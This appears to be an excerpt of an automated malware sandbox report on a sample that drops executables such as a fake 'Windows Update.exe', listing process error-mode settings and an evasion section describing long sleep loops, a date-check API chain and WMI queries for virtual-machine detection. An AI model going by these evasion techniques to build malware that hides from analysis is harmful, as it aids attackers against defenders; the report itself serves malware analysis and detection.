Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\internet explorer\ROOKKLCFJB\irecord.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-2M9B3.tmp\irecord.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\i-record\I-Record.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe TID: 6980	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe TID: 5912	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe TID: 4536	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe TID: 4536	Thread sleep time: -8640000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe TID: 4536	Thread sleep time: -960000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe TID: 6956	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe TID: 2832	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe TID: 6092	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe TID: 5204	Thread sleep time: -3600000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe TID: 7368	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe TID: 1360	Thread sleep time: -922337203685477s >= -30000s

Found evasive API chain (date check)

Source: C:\Users\user\Desktop\1nJGU59JPU.exe

Evasive API call chain: GetSystemTime,DecisionNodes

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\is-H3FQR.tmp\7((_8888YTR(.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Thread delayed: delay time: 240000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\32-0401d-119-d44a2-34100e2dbea8e\Vahutuqeke.exe	Thread delayed: delay time: 480000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Multimedia Platform\ZHunuhebaqu.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Thread delayed: delay time: 3600000
Source: C:\Program Files (x86)\Windows Multimedia Platform\Windows Update.exe	Thread delayed: delay time: 922337203685477

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Local\Temp\8e-e5544-da4-a2b8a-aabe03824c51e\Kixysyshysy.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
